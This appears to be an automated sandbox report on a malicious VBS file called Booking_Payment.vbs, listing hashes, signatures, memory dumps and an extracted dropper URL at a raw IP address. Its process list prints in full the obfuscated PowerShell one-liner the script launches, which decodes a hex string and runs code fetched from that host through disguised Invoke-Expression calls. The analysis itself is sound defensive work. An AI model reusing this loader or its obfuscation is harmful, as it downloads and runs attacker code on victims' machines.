Analysis
-
max time kernel
119s -
max time network
139s -
platform
windows7_x64 -
resource
win7-en-20210920 -
submitted
21-10-2021 18:20
Static task
static1
Behavioral task
behavioral1
Sample
Booking_Payment.vbs
Resource
win7-en-20210920
windows7_x64
0 signatures
0 seconds
General
-
Target
Booking_Payment.vbs
-
Size
4KB
-
MD5
18ac5f0f564e29f3ab4f8a48fdea9ecc
-
SHA1
47216392c30357a1de277c89703765ac8305f603
-
SHA256
2853fdee44775a8aec2874b28c52d10537ce6f383ce53f3a610f45c9c82fa212
-
SHA512
e5d71ba533a21554f142e471648e9032568872893275756684a9967b4bae4cd352ae70793b0358e1894808cf515a2f9b46431a05fbc4a50d88adaa3caab595a7
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
http://13.230.14.133/bypass.txt
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 472 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 472 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 1884 wrote to memory of 472 1884 WScript.exe powershell.exe PID 1884 wrote to memory of 472 1884 WScript.exe powershell.exe PID 1884 wrote to memory of 472 1884 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Booking_Payment.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $H = 'http://13.230.14.133/bypass.txt';$eeeeeeeeeeeeee = '+`Close`8Close31Close+0Close3dClose+0Close+7Close`1Close`1Close`1Close`1Close`1Close`1Close`1Close`1Close`+Close`+Close`+Close`+Close`+Close`+Close`+Close`+Close`3Close`3Close`3Close`3Close`3Close`3Close`3Close`3Close+7Close+eClose5+Close65Close70Close6cClose61Close63Close65Close+8Close+7Close`1Close`1Close`1Close`1Close`1Close`1Close`1Close`1Close+7Close+cClose+7Close6eClose+7Close+9Close+eClose5+Close65Close70Close6cClose61Close63Close65Close+8Close+7Close`+Close`+Close`+Close`+Close`+Close`+Close`+Close`+Close+7Close+cClose+7Close`5Close+7Close+9Close+eClose5+Close65Close70Close6cClose61Close63Close65Close+8Close+7Close`3Close`3Close`3Close`3Close`3Close`3Close`3Close`3Close+7Close+cClose+7Close7`Close+7Close+9Close3bClose+`Close`8Close3+Close+0Close3dClose+0Close+7Close``Close``Close``Close``Close``Close``Close``Close``Close`5Close`5Close`5Close`5Close`5Close`5Close`5Close`5Close`5Close`5Close`5Close+7Close+eClose5+Close65Close70Close6cClose61Close63Close65Close+8Close+7Close``Close``Close``Close``Close``Close``Close``Close``Close+7Close+cClose+7Close+eClose+7Close+9Close+eClose5+Close65Close70Close6cClose61Close63Close65Close+8Close+7Close`5Close`5Close`5Close`5Close`5Close`5Close`5Close`5Close`5Close`5Close+7Close+cClose+7Close57Close+7Close+9Close3bClose+`Close`8Close3`Close+0Close3dClose+0Close+7Close`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose5`Close5`Close5`Close5`Close5`Close5`Close5`Close5`Close5`Close5`Close`eClose5`Close+7Close+eClose5+Close65Close70Close6cClose61Close63Close65Close+8Close+7Close`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose5`Close5`Close5`Close5`Close5`Close5`Close5`Close5`Close5`Close5`Close+7Close+cClose+7Close`9Close`5Close+7Close+9Close3bClose+`Close`8Close33Close+0Close3dClose+0Close+7Close`cClose`cClose`cClose`cClose`cClose`cClose`cClose`cClose`cClose`cClose+7Close+eClose5+Close65Close70Close6cClose61Close63Close65Close+8Close+7Close`cClose`cClose`cClose`cClose`cClose`cClose`cClose`cClose`cClose+7Close+cClose+7Close6+Close`3Close+7Close+9Close3bClose+`Close`8Close`8Close+0Close3dClose+0Close+`Close`8Close31Close+bClose+`Close`8Close3+Close+bClose+`Close`8Close33Close+bClose+`Close`8Close3`Close3bClose+`Close`8Close`8Close`8Close+0Close3dClose+0Close+7Close``Close`fClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose6eClose`7Close+7Close+eClose5+Close65Close70Close6cClose61Close63Close65Close+8Close+7Close+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+7Close+cClose+7Close57Close6eClose`cClose6fClose61Close``Close53Close5`Close7+Close`9Close+7Close+9Close3bClose+`Close`8Close`8Close`8Close`8Close+0Close3dClose+7Close`9Close60Close+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose`5Close63Close+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose`8Close+9Close+eClose+`Close`8Close`8Close`8Close+8Close+`Close`8Close+9Close+7Close+eClose5+Close65Close70Close6cClose61Close63Close65Close+8Close+7Close60Close+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+7Close+cClose+7Close`5Close58Close+8Close6eClose65Close60Close57Close60Close+dClose`fClose6+Close6aClose60Close+7Close+9Close+eClose5+Close65Close70Close6cClose61Close63Close65Close+8Close+7Close+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+7Close+cClose+7Close60Close5`Close+0Close+`Close`8Close+7Close+9Close3bClose+6Close+8Close+7Close`9Close+7Close+bClose+7Close`5Close58Close+7Close+9Close+8Close+`Close`8Close`8Close`8Close`8Close+0Close+dClose`aClose6fClose69Close6eClose+0Close+7Close+7Close+9Close7cClose+6Close+8Close+7Close`9Close+7Close+bClose+7Close`5Close58Close+7Close+9Close'.Replace('`','4').Replace('+','2');$yyyyyyyyyyyyyyyyy = $eeeeeeeeeeeeee -split 'Close' |ForEach-Object {[char][convert]::ToUInt32($_,16) };$RDTFYGUIHJODRGFHTGYJH = $yyyyyyyyyyyyyyyyy -join '';$AA = 'In++++++++++++++ess'.Replace('++++++++++++++','voke-Expr') ; $BB= 'ion $R==================H'.Replace('==================','DTFYGUI');$CC='J-----------------JH'.Replace('-----------------','ODRGFHTGY');I`E`X ($AA , $BB , $CC -Join '')|I`E`X;2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/472-55-0x0000000000000000-mapping.dmp
-
memory/472-59-0x0000000002614000-0x0000000002617000-memory.dmpFilesize
12KB
-
memory/472-58-0x0000000002612000-0x0000000002614000-memory.dmpFilesize
8KB
-
memory/472-57-0x0000000002610000-0x0000000002612000-memory.dmpFilesize
8KB
-
memory/472-60-0x000007FEF2170000-0x000007FEF2CCD000-memory.dmpFilesize
11.4MB
-
memory/472-61-0x000000000261B000-0x000000000263A000-memory.dmpFilesize
124KB
-
memory/1884-54-0x000007FEFB711000-0x000007FEFB713000-memory.dmpFilesize
8KB